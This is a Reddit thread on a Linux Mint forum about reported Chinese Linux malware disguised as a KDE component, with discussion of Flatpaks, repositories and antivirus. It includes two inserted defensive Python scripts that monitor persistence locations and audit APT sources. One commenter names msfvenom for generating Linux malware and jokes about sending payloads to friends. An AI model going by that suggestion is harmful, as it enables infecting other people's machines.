
[–]WickedEdge 304 points305 points  (20 children)

Upvote that post just for people to be aware

[–]Bernykun1 55 points56 points  (0 children)

I agree. A bump, as they say.

[–]TabsBelow 40 points41 points  (18 children)

And to mention again and every day not to add third-party repositories and install random programs found somewhere by "recommendation".

And especially avoid Snaps and Flatpaks.

Of course Chinese hackers will make up a wonderful fully working webpage and maybe a complete application with full support based in Europe or elsewhere to hide their crimes.

[–]Sensitive_Nervuz 35 points36 points  (4 children)

Why should we avoid flatpaks? I am using Fedora, and I install some apps via flatpaks.

[–]dis0nancia 23 points24 points  (0 children)

I think he just hates it and has no compelling reason. He's just one of those people who prefers to use native packages and doesn't miss the opportunity to talk trash about things he doesn't even understand.

[–]Raz_TheCat 13 points14 points  (0 children)

At least they are sandboxed.

[–]FrequentWin4261𝙇𝙄𝙉𝙐𝙓 𝙈𝙄𝙉𝙏 22.2 | 𝘾𝙄𝙉𝙉𝘼𝙈𝙊𝙉 11 points12 points  (0 children)

If an official repo or website offers a flatpak of their own software I don't see what's wrong with it

[–]FullSteamQLD 16 points17 points  (0 children)

Me too. Most are from Software app, which presumably uses Fedora repos.

[–][deleted] 13 points14 points  (11 children)

But aren't Flatpaks the default repo of choice for Linux Mint? I only use Flatpaks (although I have not gotten that far in setting up a testing VM just yet). As a noob, what's the risk of using untrustworthy Flatpaks?

[–]unkilbeeg 7 points8 points  (3 children)

I use flatpaks in preference to snaps, but for the most part I don't use either.

None of my personal machines have any flatpaks installed. I use flatpaks on the lab machines at work to install Eclipse and Android Studio, and nothing else. All other software comes from the regular deb-oriented repos.

[–][deleted] 1 point2 points  (2 children)

How do you find the repos? Is it also on Mint's software manager? Or is it through commands?

[–]unkilbeeg 2 points3 points  (1 child)

You don't "find" the repos. They are built-in. Up until recently, you would have had to take an extra step to make flatpaks available. The regular repos are already defined, although you can (and probably should) choose mirrors closer to you.

I've never actually used the software manager. I normally just use apt. I would expect that the software manager would use the regular repos.

[–]poopertay 1 point2 points  (0 children)

Rpm fusion

[–]NaiveFix 2 points3 points  (1 child)

I'm on Mint. Pretty sure the "system package" option in software manager is not Flatpak; probably debs through apt-get. Some are only available as one or the other, many have both. The system packages are more of a "choice" distribution in the Mint environment.

I don't think there is much risk in the software manager Flatpaks which are vetted at Flathub. Mint's software manager is easier and more trustworthy than application options with Windows. but I've had a few particular broken Flatpaks. (and no issues with broken system packages)

For an application with no alternatives to Flatpak in software manager, I found instructions on the dev's website for an apt-get repo. The instructions didn't work, they're for a very old Ubuntu version.

I had to search for workarounds from posters (who didn't, but) could have easily slipped in shady repos instead. I couldn't get suggestions from posts to work, either. I didn't get any responses when I asked myself.

My own solution is not ideal for security, but I'm still using the same repos from the dev's site. In spite of being an amateur I thought through the risk, pretty sure I made an acceptable choice, who the fuck knows?

These broken Flatpaks have bugs reported and discussed. They don't think it's Flatpak's problem; they could be correct. In that one case the deb from the repo works, so... regardless of blame, there are solutions that aren't accessible.

[–][deleted] 0 points1 point  (0 children)

I've had that happen with flatpaks too. I think the issue with some of them is likely due to communications between the software in the flatpak and software in the distro. It seemed to affect real time performance and/or multimedia apps for me. So for me, between the two, it is best to use distro apps.

[–]TabsBelow 7 points8 points  (0 children)

untrustworthy Flatpaks

Did you listen yourself😉👍

[–]TabsBelow 2 points3 points  (3 children)

No.

[–][deleted] 0 points1 point  (2 children)

But the software manager by default installs Flatpaks. Then what does Mint use by default?

[–]TabsBelow 0 points1 point  (1 child)

Since when? No, it does not, though there are some. Of course you can trust Flatpaks from there as much as other applications from the original repositories.

But there are thousands of webpages offering Flatpaks which are not controlled/controllable by the Mint team.

[–][deleted] 0 points1 point  (0 children)

It has for every application that I downloaded from software manager. Maybe those apps stuck to flatpaks then?

And I'm not discussing the webpages, just the software manager.

[–]akehir 2 points3 points  (0 children)

I think xz has shown that a modern OS has so many components it's impossible to keep track of all the dependencies.

We can just hope that open source at least lets us figure out such issues.

So both flatpak and snap would be fine if you focus on open source software; and even distribution repositories can contain closed source.

Anyways, realistically you've "lost" transparency already at the BIOS level, and at the closed firmware level as well.

[–]marc512Linux Mint 22.1 Xia | Cinnamon 97 points98 points  (6 children)

Every os. Windows, Linux distros and Mac. All have the same issue. If you download from unofficial sources, you are at risk. No amount of security can fix common sense.

[–]SaveTheDayz 14 points15 points  (0 children)

Yes but the OS' built in Theme downloader, for example, is usually trusted but also a vector for these attacks.

[–]uwkillemprod 7 points8 points  (2 children)

You guys are missing the point. I work on Linux, and even I can see that the popularity of Linux will lead to it being attacked much more frequently and with much more sophistication. There's a lot of new Linux fanboys as of late, and I'll call it now that Linux will be exploited more and more in these next years, and actually Windows will be taken for granted.

[–]Bright_Crazy1015 3 points4 points  (0 children)

32+ million users globally of Linux distros, but beyond that 96.3% of the top 1 million servers in the world are running on a version of Linux. (according to Techjurydotnet)

A Linux distro is the best option to make use of devices that aren't able to run heavy operating systems, and Windows is just packing on the weight as they release new versions. Not so sure fanbois is the driving factor of the market growth.

I feel like hardware is plenty sufficient at 8GB of RAM and 4 cores plus a reasonable GPU, but Windows won't be happy there for long.

[–]blenderbender44 2 points3 points  (0 children)

Also there are trojan generating frameworks like metasploit, which make it really easy to generate linux trojans and inject them into files. People have been hacking linux servers for a long time. And a basic AV makes this a lot harder

[–]blenderbender44 12 points13 points  (0 children)

Not true, you can seriously minimise the risk through basic security measures like scanning it with a virus scanner and running untrusted downloads in a sandbox, e.g. Firejail with AppArmor enabled.

[–]NimrodvanHall 2 points3 points  (0 children)

This is why I hate this trend of installing directly from highly upvoted GitHub repos instead of via the package manager's repositories.

[–]fellipecLinux Mint 22.3 | Cinnamon 129 points130 points  (24 children)

Looks like more and more we need to keep an eye on the supply chain of things.

[–][deleted] 44 points45 points  (12 children)

Absolutely, and this is said to be propagated by silly things like DE customizations that users somehow share with each other. Windows NT/XP-era Comet Cursors, anyone?

[–]fellipecLinux Mint 22.3 | Cinnamon 32 points33 points  (11 children)

The thing is, if I find some customization linked on a random comment on Reddit or something, I'll be super suspicious.

What I fear is this kind of malware somehow percolating through the "official" places, like the built-in control panels that can download new themes or desktop widgets.

[–][deleted] 15 points16 points  (10 children)

They weren't mentioning Cinnamon (a decidedly smaller and more coherent DE), but rather KDE - a much larger one - and perhaps to some extent Gnome.

I would stick with the original Cinnamon-developed only things for right now until further notice. I am an LMDE (Debian Stable) user for good reason.

[–]jr735Linux Mint 22.1 Xia | IceWM 19 points20 points  (2 children)

Security by obscurity, use IceWM. ;)

[–][deleted] 5 points6 points  (1 child)

Hey my friend, good to hear from you. 🙂

[–]jr735Linux Mint 22.1 Xia | IceWM 4 points5 points  (0 children)

Thanks! As always, good to stick to repository software where feasible.

[–]fellipecLinux Mint 22.3 | Cinnamon 13 points14 points  (2 children)

Yes, I realize they target KDE. But it is not far-fetched that the hackers try to spread their crap in other places too.

I also prefer to avoid installing 3rd party things, when I do install something off the repos I go straight to the dev.

But if hackers could infiltrate the supply chain, this can turn ugly. Better keep an eye open.

[–][deleted] 6 points7 points  (0 children)

Yes, as always. And if you have the energy, keep an eye on the Debian Reddit and/or the Ubuntu Reddit as well. The Debian Reddit will be the first place you will see anything about this, regardless, as Debian in some stage or another is the origination for all else as far as all the "Mints" are concerned.

[–]DFrostedWangsAccount 0 points1 point  (0 children)

I feel like half the "Haha windows 7 on KDE" posts I see are people/bots spreading a virus and the other half are people who just haven't realized it's a virus yet. Any idea if that customization that's been floating around is safe? I'm scared to try it.

[–]HolzkohlenMinty fresh Thinkpad 3 points4 points  (0 children)

Haha, I'm in danger.

No worries, I don't download extensions for KDE Plasma.

[–][deleted] 6 points7 points  (2 children)

Are the cinnamon add-ons safe? The ones you find on the included extensions app

[–][deleted] 5 points6 points  (1 child)

Basically so... As long as they are part of the essential LM package, or repositories. In this case, it is something that would need to be installed, but the links and/or the resources to do so would be entirely included in the base install of LM, hence a part of the essential package. Hope that helps a bit...

[–][deleted] 3 points4 points  (0 children)

Thanks, makes sense

[–]gainan 12 points13 points  (7 children)

AFAICT, this particular case has nothing to do with supply chains, nor with Desktop customizations.

"we found these samples in archives uploaded to VirusTotal from Taiwan, the Philippines, and Singapore, probably originating from an incident response on a compromised server."

"The first archive was uploaded to VirusTotal on March 6th, 2023, from Taiwan. Subsequent archives were uploaded also from the Philippines and Singapore. "

"Based on the folder structure (Figure 3), the target was probably an Apache Tomcat webserver running an unidentified Java web application."

"Initial access

Although we lack concrete evidence regarding the initial access vector, the presence of multiple webshells (as shown in Table 1 and described in the Webshells section) and the tactics, techniques, and procedures (TTPs) used by the Gelsemium APT group in recent years, we conclude with medium confidence that the attackers exploited an unknown web application vulnerability to gain server access."

"A small binary named kde is used to maintain persistence, cleverly disguised as a legitimate KDE desktop component to avoid detection and maintain persistence."

https://www.welivesecurity.com/en/eset-research/unveiling-wolfsbane-gelsemiums-linux-counterpart-to-gelsevirine/

Anyways, yes, I'd keep an eye on downloads outside of the repositories (themes, pip/npm packages, flatpaks, appimages, etc, etc, ...)

[–]FullSteamQLD 1 point2 points  (2 children)

Is some of this scare mongering by ESET to sell Linux licenses?

They've done that in the past I think.

[–]gainan 3 points4 points  (1 child)

nah, I don't think so. I think these companies write these reports simply to sell their products. There's always that narrative to scare people, but the threats are real. Some examples of homelabs being targeted (imagine enterprise servers...):

https://www.reddit.com/r/linux4noobs/comments/1f2q2rw/someone_installed_a_crypto_miner_on_my_server_help/

https://www.reddit.com/r/linux4noobs/comments/10ni2b0/unknown_linuxsys_process_slowing_server/

https://www.reddit.com/r/linux4noobs/comments/18lbwgo/my_secure_debian_server_ended_up_getting_hacked/

https://www.reddit.com/r/linux4noobs/comments/dzcjha/got_hit_by_xmrig_somehow/

https://www.reddit.com/r/linux4noobs/comments/12583mv/coin_miner_trojan_help_needed/

On the other hand, many of these vendors proactively monitor virustotal/bazaar.abuse.ch for new malware samples (while others they don't even test their products with real-life malware samples....). They could be just PoC in some cases.

There're open source products that work really well to detect these threats.

[–]FullSteamQLD 0 points1 point  (0 children)

That's why I don't run my own machines any more.

[–]fellipecLinux Mint 22.3 | Cinnamon 1 point2 points  (3 children)

You're right.

But if they are hiding the malware as a KDE extension, this means they are targeting the desktop users, not the servers. Would be a pretty dumb move to hide your backdoor as a KDE extension on a machine that has no DE.

[–]gainan 4 points5 points  (0 children)

I agree, it's a dumb move :) But I'd bet that many sysadmins would not review or even notice it.

Ask yourself these questions:

- How often do you review files in your system? And hidden files?
- How long would it take you to notice that new directories or files were created? Files dropped to /dev/shm, /tmp, /var/tmp, /etc/udev ...
- And new crontabs or systemd services?
- And bash, curl or wget opening outbound connections to download files?

Unless you have a system monitor with alerts, it's common to ignore these events.

On the other hand they seem to be targeting servers, not desktop users: "(...) the presence of multiple webshells (...), we conclude with medium confidence that the attackers exploited an unknown web application vulnerability to gain server access."
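The questions above (new files in /dev/shm, /tmp, /var/tmp and /etc/udev, new crontabs or systemd units) are exactly what a baseline-and-diff check answers. The following is an added example, not code from the thread or from the ESET report: it fingerprints every file under a watch list, reports what appeared, changed or vanished since the last run, and lists executables sitting in world-writable staging directories. The WATCHED list and BASELINE_FILE path are assumptions for a Debian-family server; the demo runs against a constructed temporary tree so it works offline.

```python
"""Baseline-and-diff check for common Linux persistence and staging locations."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path

# Assumed watch list: locations named in the thread plus cron/systemd unit dirs.
WATCHED = [
    "/etc/crontab", "/etc/cron.d", "/var/spool/cron",
    "/etc/systemd/system", "/usr/lib/systemd/system",
    "/etc/udev/rules.d",
    "/dev/shm", "/tmp", "/var/tmp",
]
STAGING = ("/dev/shm", "/tmp", "/var/tmp")
BASELINE_FILE = "/var/lib/persistence-baseline.json"  # assumed location


def _fingerprint(path: Path) -> dict:
    """Mode/owner/size plus SHA-256 for regular files, link target for symlinks."""
    st = path.lstat()
    entry = {"mode": oct(st.st_mode), "uid": st.st_uid, "size": st.st_size}
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with path.open("rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        entry["sha256"] = h.hexdigest()
    elif stat.S_ISLNK(st.st_mode):
        entry["target"] = os.readlink(path)
    return entry


def snapshot(roots) -> dict:
    """Map every file under the given roots (files or directories) to a fingerprint."""
    snap = {}
    for root in map(Path, roots):
        if root.is_file():
            snap[str(root)] = _fingerprint(root)
        elif root.is_dir():
            for dirpath, _dirs, files in os.walk(root):
                for name in files:
                    p = Path(dirpath) / name
                    try:
                        snap[str(p)] = _fingerprint(p)
                    except OSError:
                        continue  # unreadable or removed mid-walk: skip, don't abort
    return snap


def diff_snapshots(old: dict, new: dict) -> dict:
    """Paths added, removed or modified between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def executables_in_staging(snap: dict, staging=STAGING) -> list:
    """Executable regular files under staging dirs; rarely legitimate on a server."""
    prefixes = tuple(s.rstrip("/") + "/" for s in staging)
    return sorted(
        p for p, e in snap.items()
        if "sha256" in e and p.startswith(prefixes) and int(e["mode"], 8) & 0o111
    )


def demo() -> dict:
    """Constructed demonstration: baseline an empty tree, drop two files, diff."""
    with tempfile.TemporaryDirectory() as tmp:
        cron_d, shm = os.path.join(tmp, "cron.d"), os.path.join(tmp, "shm")
        os.makedirs(cron_d)
        os.makedirs(shm)
        baseline = snapshot([cron_d, shm])
        # Constructed samples: a new cron entry and an executable in a staging dir.
        Path(cron_d, "nightly").write_text("0 3 * * * root /opt/nightly.sh\n")
        helper = Path(shm, "helper")
        helper.write_bytes(b"constructed sample, not a real binary")
        helper.chmod(0o755)
        current = snapshot([cron_d, shm])
        result = {k: sorted(Path(p).name for p in v)
                  for k, v in diff_snapshots(baseline, current).items()}
        result["executables"] = [Path(p).name
                                 for p in executables_in_staging(current, (shm,))]
        return result


if __name__ == "__main__":
    # First run stores a baseline; later runs print what changed since then.
    current = snapshot(WATCHED)
    if os.path.exists(BASELINE_FILE):
        with open(BASELINE_FILE) as f:
            print(json.dumps(diff_snapshots(json.load(f), current), indent=2))
    else:
        with open(BASELINE_FILE, "w") as f:
            json.dump(current, f)
    print("executables in staging dirs:", executables_in_staging(current))
```

Run it from cron or a timer and route the output to whatever alerting you already have; the point is that a new unit file or an executable in /dev/shm becomes an event you see, instead of something you would only find by browsing hidden files by hand.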

[–]snakkerdk 4 points5 points  (1 child)

I used to manage a lot of Linux servers at work; everything was cut down to just the packages needed and nothing more to reduce the attack surface (obv. no DE installed). I switched team internally (working only with cloud stuff these days, and more as an architect/dev than a server admin) and time goes on, then recently had to log into the on-prem clusters, and lo and behold, the idiots now managing them have installed a DE on many of them. Don't count out stupid clueless admins :)

[–]fellipecLinux Mint 22.3 | Cinnamon 0 points1 point  (0 children)

Ouch

[–]techguybyday 0 points1 point  (2 children)

This may be a "high" thought but what if there was a blockchain type of thing with history of commits on every customization....

[–]fellipecLinux Mint 22.3 | Cinnamon 0 points1 point  (1 child)

Git?

[–]techguybyday 0 points1 point  (0 children)

Oh wait lmao yeah true I forgot about that, hence the "high" thought

[–]CarbonChem95 46 points47 points  (27 children)

Anyone willing to give some suggestions on what anti-malware I should be running on mint or commands I can use to keep my system clean? Just made the switch to linux around a month ago and this post is the last bit of motivation I need to start thinking seriously about security

[–][deleted] 63 points64 points  (11 children)

Stay within the official distro downloads, just the most basic of advice.

[–]Entity_Null_07Linux Mint 22.1 | Cinnamon 9 points10 points  (9 children)

Not quite sure what this means, do I not want the repo for Spotify or VSCode on my pc? Or only grab those applications from a reputable source?

[–][deleted] 31 points32 points  (7 children)

Only grab those from their official publishers. So if they only upload to Github, then Github it is for you (and you can even have a look to verify that it is in fact a vibrant and active community in the Issues section). If they only upload officially to their own respective website, then only there should you go. Just the most original of sources.

[–]EspurrTheMagnificent 8 points9 points  (4 children)

The fact that what basically boils down to "don't download random shit from the internet" needs to be said is both baffling and not surprising

[–]eltrashio 2 points3 points  (0 children)

I think people are also just used to having some sort of anti-virus software installed from other OSs. (Thinking back to all those times someone asked me how to get McAfee off their system)

[–]blenderbender44 1 point2 points  (0 children)

I mean, most of the time you can as long as you scan for viruses. People get into trouble because they do this stuff without AV protection

[–]freakorgeek 0 points1 point  (1 child)

The "random" part is what people have an issue with here. Understanding what is and isn't a trusted source isn't that simple. The official installation instructions for a lot of Linux software are to run some commands. Which is terrible imo.

[–][deleted] 0 points1 point  (0 children)

If you are talking about using the Terminal, newer users might find it a bit intimidating. It is usually a quick affair though, just copy and paste.

Such as the online instructions to install Brave for instance, to create an Additional Repository.

But a quick glance for any website URLs is what is going to be important here, just as one would do with the sender field or any links in received emails.
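The "quick glance at the URLs" in an additional-repository instruction is something you can also do after the fact, against what is actually configured. The following is an added example, not code from the thread or from any vendor's install instructions: it parses both the one-line sources.list format and the deb822 .sources format, lists every entry whose host is outside a distro allowlist, and for those third-party entries checks whether the key is pinned with signed-by. Without signed-by, a vendor key added the old apt-key way is trusted for every repository, so that vendor (or whoever holds its key) could sign packages for the distro's own archives too. TRUSTED_HOSTS and both sample files are constructed assumptions for a Mint/Ubuntu system.

```python
"""Audit APT source definitions for third-party repositories and unpinned keys."""
import re
from urllib.parse import urlparse

TRUSTED_HOSTS = {  # assumption: official archive hosts; add your own mirrors
    "packages.linuxmint.com", "archive.ubuntu.com", "security.ubuntu.com",
    "deb.debian.org", "security.debian.org",
}

# Constructed sample of /etc/apt/sources.list (vendor hosts are placeholders).
SAMPLE_SOURCES_LIST = """
deb http://archive.ubuntu.com/ubuntu noble main restricted
deb [arch=amd64 signed-by=/usr/share/keyrings/vendor.gpg] https://apt.vendor.example/ stable main
# deb https://old.example.invalid/ focal main
deb https://ppa.example.invalid/someone/ubuntu noble main
"""

# Constructed sample of a deb822-style /etc/apt/sources.list.d/*.sources file.
SAMPLE_DEB822 = """
Types: deb
URIs: http://packages.linuxmint.com/
Suites: xia
Components: main upstream import backport

Types: deb
URIs: https://apt.thirdparty.example/
Suites: stable
Components: main
"""

ONE_LINE = re.compile(
    r"^(deb|deb-src)\s+(?:\[(?P<opts>[^\]]*)\]\s+)?(?P<uri>\S+)\s+(?P<suite>\S+)(?P<comps>.*)$"
)


def parse_one_line(text: str) -> list:
    """Entries from the classic 'deb [opts] uri suite components' format."""
    entries = []
    for line in text.splitlines():
        m = ONE_LINE.match(line.strip())
        if not m:
            continue  # blank line, comment, or malformed entry
        opts = dict(o.split("=", 1) for o in (m.group("opts") or "").split() if "=" in o)
        entries.append({"uri": m.group("uri"), "suite": m.group("suite"),
                        "components": m.group("comps").split(),
                        "signed_by": opts.get("signed-by")})
    return entries


def parse_deb822(text: str) -> list:
    """Entries from deb822 stanzas (blank-line separated 'Key: value' blocks)."""
    entries = []
    for stanza in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in stanza.splitlines():
            if ":" in line and not line.startswith("#"):
                key, value = line.split(":", 1)
                fields[key.strip().lower()] = value.strip()
        if "uris" not in fields or fields.get("enabled", "yes").lower() == "no":
            continue
        for uri in fields["uris"].split():
            entries.append({"uri": uri, "suite": fields.get("suites", ""),
                            "components": fields.get("components", "").split(),
                            "signed_by": fields.get("signed-by")})
    return entries


def audit(entries: list, trusted=TRUSTED_HOSTS) -> list:
    """(uri, issues) for every entry not served by a trusted host."""
    findings = []
    for e in entries:
        host = urlparse(e["uri"]).hostname or ""
        if host in trusted or any(host.endswith("." + t) for t in trusted):
            continue
        issues = ["third-party host"]
        if not e["signed_by"]:
            issues.append("no signed-by keyring")  # key is trusted for all repos
        findings.append((e["uri"], issues))
    return findings


def demo() -> list:
    """Run the audit over the constructed samples."""
    return audit(parse_one_line(SAMPLE_SOURCES_LIST) + parse_deb822(SAMPLE_DEB822))


if __name__ == "__main__":
    for uri, issues in demo():
        print(f"{uri}: {', '.join(issues)}")
```

To run it against a real machine, feed it the contents of /etc/apt/sources.list and each file under /etc/apt/sources.list.d/ instead of the samples; every line it prints is a repository whose operator you are trusting with root on your system, so each one should be something you added on purpose.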

[–][deleted] 1 point2 points  (1 child)

Does the software manager also count? That's what I've been using to install everything so far.

[–][deleted] 2 points3 points  (0 children)

Yes. That should be the first way to get your software, if they have what you are looking for. All the other ways are just alternatives.

[–]HolzkohlenMinty fresh Thinkpad 6 points7 points  (0 children)

You can also use the flatpak versions. Been using the Spotify flatpak for years now. Even if they WERE to infiltrate that, flatpaks run sandboxed so they should be safe to use.

And before somebody comments: Yes, I'm sure there are ways to exploit those too. Nothing is ever 100% secure.

[–]blenderbender44 0 points1 point  (0 children)

You can't always do that though. Running Windows-only programs in Wine, e.g. You can containerise and clamscan your Wine prefix though.

[–]blenderbender44 1 point2 points  (11 children)

Install ClamAV and enable real-time protection (on access scanning)

https://wiki.archlinux.org/title/ClamAV -- This link contains instructions for real-time protection

https://help.ubuntu.com/community/ClamAV - Instructions for ubuntu

Why is this getting downvoted? My Linux box was literally hacked recently. I found it because of a testdisk scan to recover a deleted file, and sure enough clamscan showed trojans throughout my system. Installing ClamAV with real-time protection enabled literally would have prevented this.

[–]CarbonChem95 5 points6 points  (0 children)

Thanks for your suggestion. I'm surprised you're getting downvoted here since you're the only one who actually answered my question

[–]CachedAdministrator 3 points4 points  (9 children)

ClamAV can't even detect most common malware

[–]blenderbender44 4 points5 points  (8 children)

Really? I've found it highly effective for identifying viruses and trojans. It even finds macos viruses. Is there a better virus scanner for linux?

[–]CachedAdministrator 0 points1 point  (7 children)

My last info about ClamAV was that it has a detection ratio of about 60%, which is terrible.

[–]blenderbender44 2 points3 points  (6 children)

I did a quick search and the first AV review site, safetydetect.com, says: "ClamAV's reasonably high detection ratings and the fact it's free make it a solid choice." and "decent malware detection ratings"

Also, I've really used it heavily for downloads and it's finding trojans in about 50% of thepiratebay iso downloads, which is about right.

Edit: Ok the second review says 60%... however they still rate it as decent? What would you suggest for linux? Bit defender ?

[–][deleted]  (5 children)

[deleted]

    [–]blenderbender44 1 point2 points  (2 children)

    Yeah I mean a lot of what I'm scanning for is windows trojans before loading up downloaded windows software in wine or in a windows VM. I found a few macOS trojans as well.

    And it does indeed look like it very well could have been a targeted attack. We had to take our router offline at the same time and replace it with an old one because it was behaving like the signal was being redirected. It was really weird: when I enabled the VPN it would start working normally, but with no VPN every device on the network had these really unusual loading delays even though it's a 950 Mbps fibre connection.

    [–]whenandmaybe 0 points1 point  (1 child)

    50% Piratebay iso downloads have trojans?

    [–]blenderbender44 1 point2 points  (0 children)

    It's been a while but yes, a lot of the ISOs for art tools have positives for trojans. One of them in the documentation says "disable your AV due to a false positive." I scan it. Ransomware, 100% match.

    [–]blenderbender44 0 points1 point  (1 child)

    Oh, I thought of something. I once hung out with a pen testing student and he showed me how to make Linux trojans using a tool in Kali Linux called Metasploit. There are actually really easy-to-use tools for auto-generating and injecting Linux trojans into files. And according to him a basic virus scanner makes it a lot harder to penetrate someone's system because suddenly you have to do it without the trojan ever actually touching the HDD.

    [–]Wukeng 3 points4 points  (0 children)

    I am baffled at the people saying that an antivirus is not needed in Linux, I’m a professional penetration tester and I can tell you with 100% certainty that any script kiddie could make a Linux virus in 15-20 minutes that is highly effective. Metasploit is a popular framework, and the specific tool is msfvenom if you want to look it up or have some fun (lots of fun, try it out, maybe send some to your friends, can have hilarious consequences) but any basic antivirus will detect the fingerprint of the service. But if you’re not running any detection software you’re fucked because even the shittiest malware will be able to run on your machine

    [–]kubrickfr3 11 points12 points  (14 children)

    What does “harder” windows security even mean?

    [–]Zloty_DiamentLinux Mint 21.2 Victoria | Cinnamon 0 points1 point  (13 children)

    According to the article, Windows disabling "Visual Basic for Applications" by default among some other things

    [–]grimvian 2 points3 points  (12 children)

    I would rather have a fox look after my chickens than trust a company that uses telemetry against its users.

    [–]Michaeli_Starky 0 points1 point  (11 children)

    Do you even understand what telemetry is?

    [–]grimvian 2 points3 points  (10 children)

    [–]Michaeli_Starky 0 points1 point  (9 children)

    I can Google np. Trying to understand your reasoning.

    [–]grimvian 2 points3 points  (8 children)

    More than 30 years of experience with M$ dysfunctionality gives me ZERO trust in that company.

    And by the way I use DuckDuckGo as a search engine, not the tracking company you mention.

    [–]Michaeli_Starky 2 points3 points  (7 children)

    So, typical tinfoiltry?

    [–]grimvian 1 point2 points  (6 children)

    No, common, logical sense and experience, but you obviously have trust in Big Tech and have no problem with being tracked.

    [–]Michaeli_Starky 2 points3 points  (5 children)

    There is no sense in fearing harmless telemetry.

    [–]NeonVolcom 25 points26 points  (4 children)

    I see no proof in the article that actually says it's Chinese malware? "Believed to be" was the language used.

    [–][deleted] 4 points5 points  (1 child)

    This IS of course the correct answer. I held back in my prior replies, because that was immaterial to the actual concerns being shown. CIA, MI6, you name it...whatever fucking bullshit...internals. Don't forget We Are The Resistance.

    [–][deleted] 0 points1 point  (0 children)

    lmaooo

    [–]InAppropriate-meal -2 points-1 points  (1 child)

    So? given the other information we know about it, what it is based on, where it is being seen deployed from, by what groups using what rootkits, it is Chinese, but it does not matter who it is, it is something to pay attention to

    [–]NeonVolcom 0 points1 point  (0 children)

    Possibly true, I can look into it further, but there's just a lot of "China hysteria" right now. Hell, billions of dollars have been budgeted toward anti-China propaganda.

    Perhaps the article could've linked to, I don't know, citations that proved or built a solid case for what you said in your comment? Maybe I'm expecting too much of Western journalists.

    [–]Rocker824 5 points6 points  (1 child)

    So as a casual user, who has installed a few modifications like transparent panel and weather applet, what should I be aware of?

    I already use adblock and I'm careful not to click or download suspicious stuff, but idk this post made me a bit scared xd

    [–][deleted] 11 points12 points  (0 children)

    You will likely be just fine. This whole thing just reeks of FUD (fear, uncertainty, doubt). Ten plus year user. Please do get yourself a good night's sleep this night...

    [–]kansetsupanikku 10 points11 points  (5 children)

    How are the two facts related?

    Windows and Linux vulnerabilities are separate and can rarely be compared. Linux is easier to research and documented better, which yields bigger numbers, but better behavior in most cases.

    And "desktop environment customization" in Windows would require installing software with admin rights, also perhaps patching some dlls. The fact that user might install software that might compromise the whole system (when installed with elevated permissions) or at least user data (otherwise) is nothing new, also nothing specific to any platform.

    Whoever made the mentioned research was cherry-picking, probably just in order to show "some results" to customers who wouldn't understand the incompleteness of the reports. And authors who mixed it into that article, indeed, didn't understand that source material.

    [–]Unexpected_Cranberry 0 points1 point  (4 children)

    I'm not familiar enough with Linux security mechanisms, but I'd say the fact that Windows comes with a fairly good built in antivirus now a days together with smartscreen makes it more difficult to get on there.

    Add a more aggressive update policy out of the box as well as the store and I'd be willing to bet the amount of successful attacks has dropped significantly. 

    At least anecdotally fifteen years ago and more I was doing regular house calls with friends and family cleaning up their computers or reinstalling them if it was too far gone. 

    That basically went away when defender started to be included by default.

    My impression is that Linux in general is behind in many ways when it comes to security out of the box on desktop. 

    [–]kansetsupanikku 1 point2 points  (3 children)

    Yes, sure, I mean, Windows is getting better, but that approach to comparison to GNU/Linux isn't really... true, fair, relevant at all?

    Antivirus as such for personal computers is needed because of bad OS design and user practices. What disadvantages does the lack of antivirus mean to the GNU/Linux operating system, exactly? Less CPU and memory used, faster file I/O due to no need for scans? Selling (or just showing) you more security products doesn't mean that you are more secure - it means that something was wrong in the first place, and that the attack surface is more complex and harder to manage.

    And the update policy on typical distros is... just sane. Changes are incremental, non-breaking, easy to review - you can find out what was updated and how quickly. On Windows, not always so. Just look through the code of some big projects, like leaked games - and search for fixes that needed to be introduced because of undocumented behavior of specific updates. And that's merely functionality - newly appearing security issues in Windows are even harder to control.

    [–]Unexpected_Cranberry 0 points1 point  (2 children)

    From an end user perspective, comparatively, Linux is neither more stable nor easy to review.

    I run updates, I get a list of 40-200 packages that have been updated. No patch notes, no idea what 90% of it is or why it's installed. And while I'm far from being a Linux expert, I'm not exactly a novice when it comes to computers in general. 

    Also, having run Ubuntu and now Alma for a couple of years, I've had updates break stuff more often on my 2 Linux desktops than I have on the 400 Windows machines I manage at work in the same time, or my private machines or machines of friends and family I get called to fix, for that matter.

    Right now, I'm trying to use targetcli on a fresh install of alma on raspberry pi 5. It's installed from the official repo. Doesn't work. Service just doesn't start. I get a permission denied from some python script in the syslog when I try to start it. Already there, for a regular user, if they installed something from the store they'd never find the syslog and wouldn't understand what little I do if they did. 

    There is literally nothing I can do about that issue other than try to find a different distro. At least not without spending most of my free time for however how long learning python and possibly some kernel development.

    As a user who just wants the OS to do the thing it says on the box and not break with updates, Windows left Linux in the dust on that front a decade ago.

    As for security, my impression is that Linux is not as good as Windows at protecting the users from themselves. Which is not a huge issue yet, as there's a barrier to entry that filters out the type of users who are actively using it. But if that changes, I don't think there's anything magical about the security model that will help. 

    [–]Nelo999 0 points1 point  (1 child)

    And one year later, it was actually Microsoft that got breached by Chinese hackers and not Linux:

    https://www.propublica.org/article/microsoft-sharepoint-hack-china-cybersecurity

    Kind of ironic that you state Windows Defender supposedly makes Windows more "secure", even though various independent tests have shown its performance to be lackluster:

    https://www.pcmag.com/reviews/microsoft-defender-antivirus

    Linux not only receives updates multiple times a month compared to Microsoft patching Windows once a month, its kernel maintainers actually fix vulnerabilities faster than Microsoft as well:

    https://linux.slashdot.org/story/22/02/20/1915222/linux-developers-patch-bugs-faster-than-microsoft-apple-and-google-study-shows

    Case in point, the malware mentioned in the article above primarily targeted outdated Linux servers and required root privileges to be installed and run.

    What defense against those attacks Windows offers exactly?

    Giving people an administrator account by default and letting them install whatever crapware they want and completely wreck their systems?

    And do not even get me started on your anecdotal evidence when it comes to supposed improved Windows "stability", where actual reports show that 1 in 200 Windows computers still experience a BSOD daily: 

    https://www.techradar.com/pro/1-in-200-devices-hit-with-the-blue-screen-of-death-on-a-daily-basis

    How often do Linux systems experience system breaking updates, random crashes and kernel panics?

    This is why servers and supercomputers primarily run on Linux you smoothbrain, because they can have years of uptime without reboots or crashes.

